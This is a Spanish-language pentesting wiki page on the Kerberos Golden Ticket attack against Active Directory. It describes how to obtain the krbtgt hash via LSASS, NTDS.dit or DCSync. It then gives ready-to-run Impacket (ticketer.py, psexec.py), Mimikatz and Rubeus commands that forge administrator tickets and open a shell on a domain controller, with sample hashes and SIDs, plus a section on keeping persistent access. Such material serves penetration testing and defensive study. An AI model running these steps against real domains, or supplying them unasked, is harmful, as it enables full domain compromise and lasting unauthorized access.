Golden Ticket

Un ataque Golden Ticket consiste en la creación de un Ticket Granting Ticket (TGT) legítimo haciéndose pasar por cualquier usuario mediante el uso del hash NTLM de la cuenta krbtgt de Active Directory (AD) . Esta técnica es particularmente ventajosa porque permite el acceso a cualquier servicio o máquina dentro del dominio como usuario suplantado. Es fundamental recordar que las credenciales de la cuenta krbtgt nunca se actualizan automáticamente .

Para adquirir el hash NTLM de la cuenta krbtgt, se pueden emplear varios métodos. Se puede extraer del proceso del Servicio del subsistema de la autoridad de seguridad local (LSASS) o del archivo de Servicios de directorio NT (NTDS.dit) ubicado en cualquier controlador de dominio (DC) dentro del dominio. Además, ejecutar un ataque DCsync es otra estrategia para obtener este hash NTLM, que se puede realizar utilizando herramientas como el módulo lsadump::dcsync de Mimikatz o el script secretsdump.py de Impacket. Es importante subrayar que para realizar estas operaciones, normalmente se requieren privilegios de administrador de dominio o un nivel similar de acceso .

Aunque el hash NTLM sirve como un método viable para este propósito, se recomienda falsificar tickets utilizando las claves Kerberos del Estándar de cifrado avanzado (AES) (AES128 y AES256) por razones de seguridad operativa.

Para Linux

python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
python psexec.py jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass

Para Windows

Para Windows primero tenemos que sacar la información del ticket, lo podemos sacar con el siguiente comando de mimikatz: lsdump::lsa /inject /name:krbtgtx

Tanto la info de sid, NTLM, user, ticket la sacamos del archivo sacado de arriba:

#mimikatz
kerberos::golden /domain:dc.local /sid:S-1-5-21-4066880836-4224972821-598642215 /rc4:1ae3bfc4f989ca44bc8ef7ceff9db64e /user:Administrador /ticket:golden.kirbi
.\Rubeus.exe ptt /ticket:golden.kirbi
klist #List tickets in memory

# Example using aes key
kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /aes256:430b2fdb13cc820d73ecf123dddd4c9d76425d4c2156b89ac551efb9d591a439 /ticket:golden.kirbi

Persistencia

Si hemos efectuado un Golden Attack y queremos tener persistencia absoluta en el DC, podemos realizar el siguiente proceso:

Primero creamos el ticket:

 kerberos::golden /domain:dc.local /sid:S-1-5-21-4066880836-4224972821-598642215 /rc4:1ae3bfc4f989ca44bc8ef7ceff9db64e /user:Administrador /ticket:golden.kirbi

Nos lo pasamos a nuestra máquina, que seguramente ya lo tenemos si hemos explotado el Golden

ticketer.py -nthash 1ae3bfc4f989ca44bc8ef7ceff9db64e -domain-sid S-1-5-21-4066880836-4224972821-598642215 -domain dc.local Administrador

Esto nos creará un archivo "Administrador.ccache"

Exportar una variable de entorno llamada "KRB5CCNAME" export KRB5CCNAME="/File/To/Golden_Tickets/Administrador.ccache"
Al final lo que estamos haciendo arriba es utilizar el ticket golden para iniciar sesión al DC.

psexec.py -n -k dc.local/Administrador@DC-Company cmd.exe

Referencias

PreviousSilver Ticket NextDiamond Ticket

Last updated 10 months ago